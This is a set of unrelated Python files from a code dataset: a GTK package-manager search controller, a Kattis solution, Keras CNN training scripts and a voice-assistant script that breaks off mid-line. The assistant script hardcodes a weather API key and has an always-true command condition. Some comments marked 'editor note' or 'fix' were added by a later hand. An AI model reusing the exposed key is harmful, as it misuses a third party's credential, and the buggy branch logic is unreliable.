self._service._unsupported_applications_signal(\n list(manual_pkg_ids), pkg_ids)\n GLib.idle_add(_notify)\n\n const_debug_write(\n __name__,\n \"__simulate_orphaned_apps: completed\")\n\n def __search_thread(self, text):\n\n # this will be accessible to all the embedded functions here\n split_text = text.strip().split()\n if not split_text:\n return\n\n def _in_config():\n GLib.idle_add(self.emit, \"view-want-change\",\n RigoViewStates.PREFERENCES_VIEW_STATE,\n None)\n\n def _in_repo():\n GLib.idle_add(self.emit, \"view-want-change\",\n RigoViewStates.REPOSITORY_VIEW_STATE,\n None)\n\n def _in_groups():\n GLib.idle_add(self.emit, \"view-want-change\",\n RigoViewStates.GROUPS_VIEW_STATE,\n None)\n\n def _in_vte():\n GLib.idle_add(self.emit, \"view-want-change\",\n RigoViewStates.WORK_VIEW_STATE,\n None)\n\n def _in_simulate_i():\n sim_str = \" \".join(split_text[1:])\n if sim_str:\n self.install(sim_str, simulate=True)\n\n def _in_simulate_r():\n sim_str = \" \".join(split_text[1:])\n if sim_str:\n self.remove(sim_str, simulate=True)\n\n def _in_simulate_o():\n sim_str = \" \".join(split_text[1:])\n if sim_str:\n self.__simulate_orphaned_apps(sim_str, simulate=True)\n\n def _in_simulate_u():\n self.upgrade(simulate=True)\n\n def _in_simulate_v():\n self._show_action_queue_items(_invalid_matches=True)\n\n def _do_install():\n sim_str = \" \".join(split_text[1:])\n if sim_str:\n self.install(sim_str)\n\n def _do_remove():\n sim_str = \" \".join(split_text[1:])\n if sim_str:\n self.remove(sim_str)\n\n def _do_optimize_mirrors():\n with self._entropy.rwsem().reader():\n repository_ids = self._entropy.repositories()\n self._service.optimize_mirrors(repository_ids)\n\n def _in_kernels_generic(kernel_virtual):\n with self._entropy.rwsem().reader():\n pkg_matches = self._kswitch.list(virtual=kernel_virtual)\n self.set_many_safe(pkg_matches, _from_search=True)\n\n def _in_kernels():\n _in_kernels_generic(kswitch.KERNEL_BINARY_VIRTUAL)\n\n def _in_kernels_lts():\n _in_kernels_generic(kswitch.KERNEL_BINARY_LTS_VIRTUAL)\n\n special_keys_map = {\n \"in:kernels\": _in_kernels,\n \"in:kernels-lts\": _in_kernels_lts,\n \"in:confupdate\": self._service.configuration_updates,\n self.SHOW_QUEUE_KEY: self._show_action_queue_items,\n \"in:config\": _in_config,\n \"in:notice\": self._service.noticeboards,\n \"in:groups\": _in_groups,\n \"in:repo\": _in_repo,\n \"in:vte\": _in_vte,\n \"do:simulate:i\": _in_simulate_i,\n \"do:simulate:r\": _in_simulate_r,\n \"do:simulate:o\": _in_simulate_o,\n \"do:simulate:u\": _in_simulate_u,\n \"do:simulate:v\": _in_simulate_v,\n \"do:update\": self._update_repositories_safe,\n \"do:install\": _do_install,\n \"do:remove\": _do_remove,\n \"do:upgrade\": self.upgrade,\n \"do:hello\": self._service.hello,\n \"do:optimize\": _do_optimize_mirrors,\n }\n\n special_f = special_keys_map.get(split_text[0])\n if special_f is not None:\n special_f()\n return\n\n return self.__search_thread_body(text)\n\n def __search_thread_body(self, text):\n \"\"\"\n Core logic that implements the effective search task.\n \"\"\"\n\n # serialize searches to avoid segfaults with sqlite3\n # (apparently?)\n with self._search_thread_mutex:\n # Do not execute search if repositories are\n # being hold by other write\n acquired = self._service.repositories_lock.acquire(False)\n if not acquired:\n # this avoids having starvation here.\n return\n try:\n\n matches = self.__search_produce_matches(text)\n # we have to decide if to show the treeview in\n # the UI thread, to avoid races (and also because we\n # have 
to...)\n self.set_many_safe(matches, _from_search=text)\n if matches:\n self._add_recent_search_safe(text)\n\n finally:\n self._service.repositories_lock.release()\n\n def _setup_search_view(self, items_count, text):\n \"\"\"\n Setup UI in order to show a \"not found\" message if required.\n \"\"\"\n nf_box = self._not_found_box\n if items_count or text is None:\n nf_box.set_property(\"expand\", False)\n nf_box.hide()\n self._view.get_parent().show()\n else:\n self._view.get_parent().hide()\n self._setup_not_found_box(text)\n nf_box.set_property(\"expand\", True)\n nf_box.show()\n\n def _setup_not_found_box(self, search_text):\n \"\"\"\n Setup \"not found\" message label and layout\n \"\"\"\n nf_box = self._not_found_box\n with self._entropy.rwsem().reader():\n # now self._not_found_label is available\n meant_packages = self._entropy.get_meant_packages(\n search_text)\n text = escape_markup(search_text)\n\n msg = \"%s %s\" % (\n escape_markup(_(\"Nothing found for\")),\n text,)\n if meant_packages:\n first_entry = meant_packages[0]\n app = Application(\n self._entropy, self._entropy_ws,\n self._service, first_entry)\n name = app.name\n\n msg += \", %s\" % (  # editor note: the <a href> link markup below was stripped during extraction and has been restored (it is required by the two escape_markup(name) arguments and the activate-link handler)\n prepare_markup(_(\"did you mean <a href=\\\"%s\\\">%s</a>?\")) % (\n escape_markup(name),\n escape_markup(name),),)\n\n self._not_found_label.set_markup(msg)\n\n def _on_not_found_label_activate_link(self, label, text):\n \"\"\"\n Handling the click event on <a> of the\n \"not found\" search label. Just write the coming text\n to the Gtk.SearchEntry object.\n \"\"\"\n if text:\n self._search_entry.set_text(text)\n self._search(text)\n\n @property\n def _not_found_box(self):\n \"\"\"\n Return a Gtk.VBox containing the view that should\n be shown when no apps have been found (due to a search).\n \"\"\"\n if self._not_found_search_box is not None:\n return self._not_found_search_box\n # here we always have to access from the same thread\n # otherwise Gtk will go boom anyway\n box_align = Gtk.Alignment()\n box_align.set_padding(10, 10, 0, 0)\n box = Gtk.VBox()\n box_align.add(box)\n label = Gtk.Label(label=_(\"Not found\"))\n label.connect(\"activate-link\", self._on_not_found_label_activate_link)\n box.pack_start(label, True, True, 0)\n box_align.show()\n\n self._nf_box.pack_start(box_align, False, False, 0)\n self._nf_box.show_all()\n self._not_found_label = label\n self._not_found_search_box = box_align\n return box_align\n\n def _update_repositories(self):\n \"\"\"\n Spawn Repository Update on RigoDaemon\n \"\"\"\n self._service.update_repositories([], False)\n\n def _update_repositories_safe(self):\n \"\"\"\n Same as _update_repositories() but thread safe.\n \"\"\"\n GLib.idle_add(self._update_repositories)\n\n def _ensure_cache_dir(self):\n \"\"\"\n Make sure the cache directory is available.\n \"\"\"\n path = self.RECENT_SEARCHES_DIR\n try:\n os.makedirs(path)\n except OSError as err:\n if err.errno == errno.EEXIST:\n if os.path.isfile(path):\n os.remove(path) # fail, yeah\n return\n elif err.errno == errno.ENOTDIR:\n # wtf? 
we will fail later for sure\n return\n elif err.errno == errno.EPERM:\n # meh!\n return\n raise\n\n def _load_recent_searches(self):\n \"\"\"\n Load from disk a list() of recent searches.\n \"\"\"\n self._ensure_cache_dir()\n data = self._cacher.pop(\n self.RECENT_SEARCHES_CACHE_KEY,\n cache_dir=self.RECENT_SEARCHES_DIR)\n if data is None:\n return []\n return data[:self.RECENT_SEARCHES_MAX_LEN]\n\n def _store_recent_searches(self, searches):\n \"\"\"\n Store to disk a list of recent searches.\n \"\"\"\n self._ensure_cache_dir()\n self._cacher.save(\n self.RECENT_SEARCHES_CACHE_KEY,\n searches,\n cache_dir=self.RECENT_SEARCHES_DIR)\n\n def _store_searches_thread(self):\n \"\"\"\n Thread body doing recent searches writeback.\n \"\"\"\n data = {\n 'sem': Semaphore(0),\n 'res': None,\n }\n const_debug_write(\n __name__, \"running recent searches writeback\")\n\n def _get_list():\n searches = [x[0] for x in self._search_completion_model]\n data['res'] = searches\n data['sem'].release()\n GLib.idle_add(_get_list)\n\n data['sem'].acquire()\n searches = data['res']\n self._store_recent_searches(searches)\n self._search_writeback_thread = None\n const_debug_write(\n __name__, \"searches writeback complete\")\n\n def _add_recent_search_safe(self, search):\n \"\"\"\n Add text element to recent searches.\n \"\"\"\n if len(search) < self.MIN_RECENT_SEARCH_KEY_LEN:\n return\n\n if search not in self._search_completion_model_set:\n def _prepend():\n self._search_completion_model.prepend((search,))\n self._search_completion_model_set.add(search)\n GLib.idle_add(_prepend)\n\n with self._search_writeback_mutex:\n if self._search_writeback_thread is None:\n task = Timer(15.0, self._store_searches_thread)\n task.name = \"StoreRecentSearches\"\n task.daemon = True\n self._search_writeback_thread = task\n task.start()\n\n def _sort_key(self, package_match):\n \"\"\"\n Return the object used for sorting a list of package matches.\n \"\"\"\n return Application(\n self._entropy, self._entropy_ws,\n self._service, package_match).name\n\n def search(self, text):\n \"\"\"\n Execute an Application Search.\n \"\"\"\n self._search(text, _force=True)\n\n def setup(self):\n # load recent searches\n for search in self._load_recent_searches():\n self._search_completion_model.append([search])\n self._search_completion_model_set.add(search)\n\n # Not enabling because it doesn't work as intended\n # self._search_entry.set_completion(self._search_completion)\n\n pref = Preference(\n -1, _(\"Update repositories\"),\n _(\"Force the update of the available repositories.\"),\n \"view-refresh\", self._update_repositories)\n self._prefc.append(pref)\n\n def _update():\n self.emit(\"view-want-change\",\n RigoViewStates.STATIC_VIEW_STATE,\n None)\n self._service.configuration_updates()\n pref = Preference(\n 100, _(\"Show Configuration File Updates\"),\n _(\"Show (if any) the list of pending configuration file \"\n \"updates.\"),\n Icons.CONFIGURATION_FILE, _update)\n self._prefc.append(pref)\n\n def _show_installed():\n self._search(ApplicationsViewController.SHOW_INSTALLED_KEY,\n _force=True)\n pref = Preference(\n -2, _(\"Show Installed Applications\"),\n _(\"Browse through the currently Installed Applications.\"),\n \"drive-harddisk\", _show_installed)\n self._prefc.append(pref)\n\n def _optimize_mirrors():\n with self._entropy.rwsem().reader():\n repository_ids = self._entropy.repositories()\n self._service.optimize_mirrors(repository_ids)\n pref = Preference(\n 50, _(\"Optimize Download Speed\"),\n _(\"Benchmark the download 
mirrors to speed up Application\"\n \" installation.\"),\n \"browser-download\", _optimize_mirrors)\n self._prefc.append(pref)\n\n def _show_kernel_bins():\n self._search(ApplicationsViewController.SHOW_KERNEL_BINS_KEY,\n _force=True)\n pref = Preference(\n -2, _(\"Show Available Kernels\"),\n _(\"Browse through the available and installable Linux \"\n \"kernel binaries.\"),\n \"applications-development\", _show_kernel_bins)\n self._prefc.append(pref)\n\n def _show_kernel_lts_bins():\n self._search(ApplicationsViewController.SHOW_KERNEL_LTS_BINS_KEY,\n _force=True)\n pref = Preference(\n -2, _(\"Show Available Long-Term-Stable Kernels\"),\n _(\"Browse through the available and installable Linux \"\n \"LTS kernel binaries.\"),\n \"preferences-system\", _show_kernel_lts_bins)\n self._prefc.append(pref)\n\n def _show_queue_view(widget):\n self._search(ApplicationsViewController.SHOW_QUEUE_KEY,\n _force=True)\n self._bottom_nc.connect(\"show-queue-view\", _show_queue_view)\n def _clear(widget):\n self.clear()\n self._store.connect(\"all-vanished\", _clear)\n\n self._view.set_model(self._store)\n self._search_entry.connect(\n \"changed\", self._search_changed)\n self._search_entry.connect(\"icon-release\",\n self._search_icon_release)\n self._search_entry.connect(\"activate\",\n self._search_activate)\n self._view.show()\n\n def clear_silent(self):\n self._view.clear_model()\n ApplicationMetadata.discard()\n\n def deselect(self):\n \"\"\"\n Deselect currently selected Applications.\n \"\"\"\n self._view.clear_selection()\n\n def clear(self):\n self.clear_silent()\n if const_debug_enabled():\n const_debug_write(__name__, \"AVC: emitting view-cleared\")\n self.emit(\"view-cleared\")\n\n def append(self, opaque):\n self._store.append([opaque])\n if const_debug_enabled():\n const_debug_write(__name__, \"AVC: emitting view-filled\")\n self.emit(\"view-filled\")\n\n def append_many(self, opaque_list):\n for opaque in opaque_list:\n self._store.append([opaque])\n if const_debug_enabled():\n const_debug_write(__name__, \"AVC: emitting view-filled\")\n self.emit(\"view-filled\")\n\n def set_many(self, opaque_list, _from_search=None):\n self._view.clear_model()\n ApplicationMetadata.discard()\n self.append_many(opaque_list)\n self._setup_search_view(\n len(opaque_list), _from_search)\n\n def clear_safe(self):\n GLib.idle_add(self.clear)\n\n def clear_silent_safe(self):\n GLib.idle_add(self.clear_silent)\n\n def append_safe(self, opaque):\n GLib.idle_add(self.append, opaque)\n\n def append_many_safe(self, opaque_list):\n GLib.idle_add(self.append_many, opaque_list)\n\n def set_many_safe(self, opaque_list, _from_search=None):\n GLib.idle_add(self.set_many, opaque_list,\n _from_search)\n","repo_name":"Sabayon/entropy","sub_path":"rigo/rigo/ui/gtk3/controllers/applications.py","file_name":"applications.py","file_ext":"py","file_size_in_byte":30193,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"40"} +{"seq_id":"22166017808","text":"LIMIT = int(2**15.5 + 3)\r\nsieve = [True] * (LIMIT + 1)\r\nprimes = []\r\n\r\np = 2\r\nwhile p <= LIMIT:\r\n if sieve[p]:\r\n primes.append(p)\r\n for i in range(2*p, LIMIT, p):\r\n sieve[i] = False\r\n if p == 2:\r\n p -= 1\r\n p += 2\r\n\r\nrev = dict(map(reversed, enumerate(primes)))\r\n\r\ndef pf(n):\r\n res = {}\r\n idx = 0\r\n while n != 1 and idx < len(primes):\r\n if n % primes[idx] == 0:\r\n n //= primes[idx]\r\n res[primes[idx]] = res.get(primes[idx], 0) + 1\r\n else:\r\n idx += 1\r\n if n != 1:\r\n is_prime = True\r\n for 
p in range(primes[idx - 1], int(n**0.5) + 2):\r\n if n % p == 0:\r\n is_prime = False\r\n res[p] = 1\r\n if is_prime: res[n] = 1\r\n return res\r\n\r\nimport sys\r\nfor line in sys.stdin:\r\n x = int(line)\r\n r = 1\r\n for k, v in pf(x).items():\r\n r *= v**k\r\n print(x, r)","repo_name":"RussellDash332/kattis","sub_path":"src/Fundamental Neighbors/fundamentalneighbors.py","file_name":"fundamentalneighbors.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"40"} +{"seq_id":"39291354047","text":"import boto3\n\n\nclass Session:\n def __init__(self):\n self._user_session = boto3.session.Session()\n self.user_region = self._user_session.region_name\n\n\nclass Sts(Session):\n def __init__(self):\n Session.__init__(self)\n self._account_client = boto3.client(\"sts\")\n self.account_id = self._account_client.get_caller_identity()[\"Account\"]\n","repo_name":"u93/multa-metrics-collector","sub_path":"src/functions/handlers/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25891355836","text":"import random\nprint('You live in a pretty messy world, this world is limited in supplies and in clean water. Your job is to deliver supplies to the next city.')\ntotalsupplies = 50 \ndelivered = random.randint(10,82)\ndayCount = 0 \ntrialnum = 0\nwhile trialnum < 10000 :\n totalsupplies = 50\n while totalsupplies < 1000000 :\n totalsupplies += delivered\n dayCount += 1\n trialnum += 1 \nprint('total supplies:', totalsupplies)\nprint('total days:', dayCount)\nprint('total trials:', trialnum) \nprint('Average number of days are :', dayCount/trialnum) \n","repo_name":"beanzbish/My-very-own-repository","sub_path":"project4.py","file_name":"project4.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6470118127","text":"import glob, csv, sys, os, re, json, nltk\nimport time, datetime\nimport numpy as np\nimport pandas as pd\nfrom keras.models import Sequential\nfrom keras.layers import Embedding, Conv1D, GlobalMaxPool1D, Dropout, Dense, Activation\nfrom keras.callbacks import CSVLogger\n\nPATH = \"data/sentiment_analysis/tweets/*.tsv\"\nPATH_SAVE = \"data/sentiment_analysis/tweets_predicted\"\ntest_date = \"2018-06-01\"\nval_date = \"2018-05-01\"\n\nstop_words = set(nltk.corpus.stopwords.words(\"english\"))\nps = nltk.stem.PorterStemmer()\n\n\nif sys.version_info[0] == 3:\n from urllib.request import urlopen\nelse:\n from urllib import urlopen\n\n\ndef get_currency_prices():\n\n # connect to poloniex's API\n CURRENCIES = ['USDT_BTC', 'USDT_LTC', 'USDT_ETH', 'USDT_XRP']\n url = 'https://poloniex.com/public?command=returnChartData¤cyPair=$C&start=1451602800&end=1530568800&period=86400'\n urls = [url.replace('$C', c) for c in CURRENCIES]\n\n for i, c in enumerate(CURRENCIES):\n with urlopen(urls[i]) as url:\n r = url.read()\n d = json.loads(r.decode())\n df = pd.DataFrame(d)\n df.to_pickle('data/sentiment_analysis/poloniex/' + c + '.pkl')\n print('Successfully downloaded', c)\n\n\ndef get_labels(training_data):\n\n btc_price_path = 'data/sentiment_analysis/poloniex/USDT_BTC.pkl'\n if not os.path.exists(btc_price_path):\n get_currency_prices()\n btc_df = pd.read_pickle(btc_price_path)\n btc_df_values = btc_df.values\n\n labels = []\n for data in training_data:\n\n index = 
np.where((btc_df_values[:,1]>=data[5]-23*60*60) & (btc_df_values[:,1]<=data[5]))[0]\n # editor note: the upper-bound comparison and the 'if' line below were eaten by HTML\n # tag-stripping during extraction; '<=data[5]' and the trailing '[0]' are reconstructions\n # inferred from the symmetric 'elif' branch and the '(a/b)[0]' indexing that follows.\n if btc_df_values[index+1,0] > btc_df_values[index, 0]:\n coef = [(btc_df_values[index,0]/btc_df_values[index+1,0])[0], 1]\n elif btc_df_values[index+1,0] < btc_df_values[index, 0]:\n coef = [(btc_df_values[index+1,0]/ btc_df_values[index,0])[0], -1]\n\n labels = np.append(labels, coef).reshape(-1, 2)\n\n return labels\n\n\ndef make_dictionary(data):\n dict = {}\n i = 1\n for row in data:\n for word in row[1].split():\n if word not in dict.keys():\n dict[word] = i\n i += 1\n return dict\n\n\ndef make_bag_of_words(data, dict):\n bag_of_words = []\n for row in data:\n tweet_rep = np.zeros(shape=(30), dtype=np.int64)\n i = 0\n for word in row[1].split():\n ind = dict.get(word)\n tweet_rep[i] = ind if ind else 0\n i += 1\n if i==30:\n break\n bag_of_words = np.append(bag_of_words, tweet_rep).reshape(-1,30)\n\n return bag_of_words\n\n\ndef build_model(input_dim, output_dim, input_len):\n\n model = Sequential()\n model.add(Embedding(input_dim, output_dim, input_length=input_len))\n model.add(Conv1D(filters=250, kernel_size=5, padding='valid', activation='relu', strides=1))\n model.add(GlobalMaxPool1D())\n model.add(Dropout(0.5))\n model.add(Dense(2))\n model.add(Activation('sigmoid'))\n return model\n\n\ndef call_model(model, train_bag, train_labels, val_bag, val_labels):\n model.compile(loss='binary_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n\n model.fit(train_bag, train_labels,\n batch_size=8,\n epochs=50,\n validation_data=(val_bag, val_labels),\n verbose=1,\n callbacks=[CSVLogger('nn_models/logger_sent.csv', append=True)])\n\n model.save('nn_models/sent.h5')\n\n\ndef cnn_process(train_data, val_data, test_data, train_labels, val_labels):\n\n dict = make_dictionary(train_data)\n\n train_bag = make_bag_of_words(train_data, dict)\n val_bag = make_bag_of_words(val_data, dict)\n test_bag = make_bag_of_words(test_data, dict)\n\n input_dim = (sorted(dict.values(), reverse=True))[0] + 1\n output_dim = 100\n input_len = len(train_bag[1, :])\n model = build_model(input_dim, output_dim, input_len)\n call_model(model, train_bag, train_labels, val_bag, val_labels)\n model.load_weights('nn_models/sent.h5')\n predicted = model.predict(test_bag)\n return predicted","repo_name":"kuzmanovicd/crypto-predictor","sub_path":"sent_cnn.py","file_name":"sent_cnn.py","file_ext":"py","file_size_in_byte":4119,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"}
+{"seq_id":"36943479073","text":"from tensorflow.keras.utils import to_categorical\nfrom sklearn.model_selection import train_test_split\nimport pandas as pd\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.keras.datasets import cifar10\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n\n(x_train, y_train), (x_test, y_test) = cifar10.load_data()\ny_train = to_categorical(y_train, 10)\ny_test = to_categorical(y_test, 10)\ninput_shape = (32, 32, 3)\n\ndatagen = ImageDataGenerator(\n featurewise_center=True,\n featurewise_std_normalization=True,\n rotation_range=20,\n width_shift_range=0.2,\n height_shift_range=0.2,\n horizontal_flip=True)\n\ndatagen.fit(x_train)\n\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Dropout, Flatten\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D, BatchNormalization\n\ncnn = Sequential()\ncnn.add(Conv2D(32, kernel_size=(3, 3), activation='relu', input_shape=input_shape))\ncnn.add(BatchNormalization())\n\ncnn.add(Conv2D(32, kernel_size=(3, 3), 
activation='relu'))\ncnn.add(BatchNormalization())\ncnn.add(MaxPooling2D(pool_size=(2, 2)))\ncnn.add(Dropout(0.25))\n\ncnn.add(Conv2D(64, kernel_size=(3,3), activation='relu'))\ncnn.add(BatchNormalization())\ncnn.add(Dropout(0.25))\n\ncnn.add(Conv2D(128, kernel_size=(3, 3), activation='relu'))\ncnn.add(BatchNormalization())\ncnn.add(MaxPooling2D(pool_size=(2, 2)))\ncnn.add(Dropout(0.25))\n\ncnn.add(Flatten())\n\ncnn.add(Dense(512, activation='relu'))\ncnn.add(BatchNormalization())\ncnn.add(Dropout(0.5))\n\ncnn.add(Dense(128, activation='relu'))\ncnn.add(BatchNormalization())\ncnn.add(Dropout(0.5))\n\ncnn.add(Dense(10, activation='softmax'))\n\ncnn.compile(loss=tf.keras.losses.categorical_crossentropy,\n optimizer=tf.keras.optimizers.Adam(),\n metrics=['accuracy'])\n\nhistor = cnn.fit_generator(datagen.flow(x_train[:40000], y_train[:40000], batch_size=32),\n steps_per_epoch=len(x_train) / 32, \n epochs=50, \n validation_data=(x_train[40000:], y_train[40000:]))","repo_name":"richardwsnyder/CAP-5610","sub_path":"Program 2/convnetDataAugmentation.py","file_name":"convnetDataAugmentation.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"25341907195","text":"import speech_recognition as sr\r\nimport pyttsx3 #converts speech to text \r\nimport pywhatkit\r\nimport datetime\r\nimport wikipedia\r\nimport pyjokes\r\nimport time \r\nimport webbrowser #To open websites\r\nimport os #To open files \r\nimport subprocess #To open files\r\nfrom tkinter import * #For the graphics \r\nfrom playsound import playsound #To play sounds\r\nimport keyboard \r\nimport winshell\r\nfrom urllib.request import urlopen\r\nimport requests\r\nimport json\r\nimport PyPDF2\r\n#from ecapture import ecapture as ec\r\n\r\n\r\n#name_assistant = \"Joonie\" #The name of the assistant\r\nname_file = open('C:/Users/DELL/OneDrive/Desktop/PYTHON/Virtual Assistant/Assistant_name.txt', \"r\")\r\nname_assistant = name_file.read() \r\n\r\n\r\nlistener = sr.Recognizer() #object creation of speech_recognition\r\nlistener.energy_threshold = 4000 #Values below this threshold are considered silence, and values above this threshold are considered speech. 
Can be changed.\r\nengine = pyttsx3.init() #object creation\r\n#voices = engine.getProperty('voices')\r\n#engine.setProperty('voice',voices[1].id)\r\nrate = engine.getProperty('rate')\r\nengine.setProperty('rate', 120) \r\n\r\ndef talk(text):\r\n engine.say(text)\r\n print(name_assistant + \" : \" + text)\r\n engine.runAndWait()\r\n\r\n#taking command from user and returning it\r\ndef take_command():\r\n try:\r\n with sr.Microphone() as source: #creating a microphone to record\r\n print('listening...')\r\n playsound('C:/Users/DELL/OneDrive/Desktop/PYTHON/Virtual Assistant/assistant_on.wav')\r\n voice = listener.listen(source,phrase_time_limit = 10)\r\n playsound('C:/Users/DELL/OneDrive/Desktop/PYTHON/Virtual Assistant/assistant_off.wav')\r\n print(\"Stop...\")\r\n command = listener.recognize_google(voice)\r\n print('You: ' + ': '+ command)\r\n if name_assistant in command:\r\n command = command.replace(name_assistant,\"\") #to remove the name of engine from our command\r\n #print(command)\r\n except Exception as e:\r\n print(e)\r\n command = \"\" #fix: avoid returning an unbound name when recognition fails\r\n #talk(\"Say that again sir\")\r\n #return \"None\"\r\n return command\r\n\r\n\r\ndef wishMe():\r\n hour=datetime.datetime.now().hour\r\n if hour >= 0 and hour < 12:\r\n talk(\"Hello,Good Morning I am your personal Assistant \"+name_assistant)\r\n elif hour >= 12 and hour < 18:\r\n talk(\"Hello,Good Afternoon I am your personal Assistant \"+name_assistant)\r\n else:\r\n talk(\"Hello,Good Evening I am your personal Assistant \"+name_assistant)\r\n\r\n\r\ndef note(text):\r\n date = datetime.datetime.now()\r\n file_name = str(date).replace(\":\", \"-\") + \"-note.txt\"\r\n with open(file_name, \"w\") as f:\r\n f.write(text)\r\n\r\n subprocess.Popen([\"notepad.exe\", file_name])\r\n\r\n\r\nwishMe()\r\n#executing the command\r\ndef run_alexa():\r\n run=1\r\n while run==1:\r\n command = take_command().lower()\r\n #fix: 'run+=1' removed here; it made the loop exit after a single command\r\n\r\n if \"hello\" in command or \"hi\" in command: #fix: original called the string and was always True\r\n wishMe()\r\n\r\n elif \"goodbye\" in command or \"okbye\" in command or \"stop\" in command:\r\n talk('Your personal assistant ' + name_assistant +' is shutting down, Good bye')\r\n screen.destroy()\r\n break\r\n\r\n elif 'date' in command:\r\n now = datetime.datetime.now()\r\n my_date = datetime.datetime.today()\r\n\r\n month_name = now.month\r\n day_name = now.day\r\n month_names = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December']\r\n ordinalnames = [ '1st', '2nd', '3rd', '4th', '5th', '6th', '7th', '8th', '9th', '10th', '11th', '12th', '13th', '14th', '15th', '16th', '17th', '18th', '19th', '20th', '21st', '22nd', '23rd','24th', '25th', '26th', '27th', '28th', '29th', '30th', '31st'] \r\n \r\n\r\n talk(\"Today is \"+ month_names[month_name-1] +\" \" + ordinalnames[day_name-1] + '.')\r\n \r\n elif 'play' in command:\r\n song = command.replace('play',\"\")\r\n talk('playing'+song)\r\n pywhatkit.playonyt(song) #plays song on youtube\r\n time.sleep(5)\r\n\r\n elif 'time' in command:\r\n current_time = datetime.datetime.now().strftime('%I:%M %p') #getting the current time in stringformat(strftime); renamed from 'time' to stop shadowing the time module\r\n talk('Current time is ' + current_time)\r\n \r\n elif 'search' in command:\r\n try:\r\n person = command.replace(\"search\",\"\")\r\n info = wikipedia.summary(person,2) #fetching only 2 lines of info\r\n talk(info) #making the assistant to read\r\n #wikipedia_screen(info)\r\n except:\r\n talk(\"Error.. 
Couldn't find!\")\r\n \r\n elif 'joke' in command:\r\n talk(pyjokes.get_joke())\r\n\r\n elif 'cricket' in command:\r\n news1 = webbrowser.open_new_tab(\"cricbuzz.com\")\r\n talk('This is live news from cricbuzz')\r\n time.sleep(6)\r\n\r\n elif 'news' in command:\r\n news2 = webbrowser.open_new_tab(\"https://timesofindia.indiatimes.com\")\r\n talk('Here are some headlines from the Times of India, Happy reading')\r\n time.sleep(6)\r\n \r\n elif 'note this' or 'make a note' in command: \r\n command = command.replace(\"note this\", \"\")\r\n note(command)\r\n\r\n elif 'open google' in command:\r\n webbrowser.open_new_tab(\"https://www.google.com\")\r\n talk(\"Google chrome is open now\")\r\n time.sleep(5)\r\n\r\n elif 'empty recycle bin' in command:\r\n winshell.recycle_bin().empty(confirm = False, show_progress = False, sound = True)\r\n talk(\"Recycle Bin Recycled\")\r\n\r\n elif \"weather\" in command: \r\n # Google Open weather website\r\n # to get API of Open weather\r\n talk(\" City name \")\r\n print(\"City name : \")\r\n with sr.Microphone() as source: #creating a microphone to record\r\n new= sr.Recognizer()\r\n voice1 = new.listen(source,phrase_time_limit = 5)\r\n city_name = new.recognize_google(voice1)\r\n #city_name = take_command()\r\n api = \"https://api.openweathermap.org/data/2.5/weather?q=\"+city_name+\"&appid=98c178f21b28af823ffb9282fb68eca9\"\r\n json_data = requests.get(api).json()\r\n \r\n if json_data[\"cod\"] != \"404\":\r\n condition = json_data['weather'][0]['main'] #getting the weather json data\r\n temp = int(json_data['main']['temp'] - 273.15) \r\n min_temp = int(json_data['main']['temp_min'] - 273.15) \r\n max_temp = int(json_data['main']['temp_max'] - 273.15) \r\n pressure = json_data['main']['pressure']\r\n humidity = json_data['main']['humidity']\r\n wind = json_data['wind']['speed']\r\n \r\n final_info = condition+\" \"+ str(temp) +\" \"+ \"Degree celsius\"\r\n print(final_info)\r\n talk(\"The weather updates are\")\r\n talk(final_info)\r\n final_data = {\"Maximum Temperature\": max_temp, \"Minimum Temperature\":min_temp, \"Pressure\":+ pressure,\"Humidity\" : humidity, \"Wind Speed\":wind}\r\n print(final_data) \r\n for i in final_data:\r\n talk(i)\r\n talk(str(final_data[i]))\r\n \r\n else:\r\n talk(\" City Not Found \")\r\n talk(\"Repeat the command\")\r\n\r\n \r\n elif \"read the book\" in command:\r\n pdfFileObject = open('C:/Users/DELL/OneDrive/Desktop/PYTHON/Virtual Assistant/my_book.pdf', 'rb')\r\n pdfReader = PyPDF2.PdfFileReader(pdfFileObject)\r\n text=''\r\n for i in range(13,pdfReader.numPages):\r\n # creating a page object\r\n pageObj = pdfReader.getPage(i)\r\n # extracting text from page\r\n text=text+pageObj.extractText()\r\n print(text)\r\n talk(text)\r\n\r\n\r\n elif 'open gmail' in command:\r\n webbrowser.open_new_tab(\"mail.google.com\")\r\n talk(\"Google Mail open now\")\r\n time.sleep(5) \r\n\r\n elif 'who are you' in command or 'what can you do' in command:\r\n talk('I am '+name_assistant+' your personal assistant. 
I am programmed to minor tasks like opening youtube, google chrome, and search wikipedia etcetra') \r\n\r\n\r\n elif \"who made you\" in command or \"who created you\" in command or \"who discovered you\" in command:\r\n talk(\"I was built by my master Bhavna\")\r\n\r\n else:\r\n talk('please say the command again!')\r\n\r\n#while True:\r\n#run_alexa()\r\n #time.sleep(10)\r\n\r\ndef change_name():\r\n name_info = name.get()\r\n file=open(\"Assistant_name\", \"w\")\r\n file.write(name_info)\r\n file.close()\r\n settings_screen.destroy()\r\n #screen.destroy()\r\n\r\n\r\ndef change_name_window():\r\n global settings_screen\r\n global name\r\n\r\n\r\n settings_screen = Toplevel(screen)\r\n settings_screen.title(\"Settings\")\r\n settings_screen.geometry(\"300x300\")\r\n settings_screen.iconbitmap('C:/Users/DELL/OneDrive/Desktop/PYTHON/Virtual Assistant/app_icon.ico')\r\n\r\n \r\n name = StringVar()\r\n\r\n current_label = Label(settings_screen, text = \"Current name: \"+ name_assistant)\r\n current_label.pack()\r\n\r\n enter_label = Label(settings_screen, text = \"Please enter your 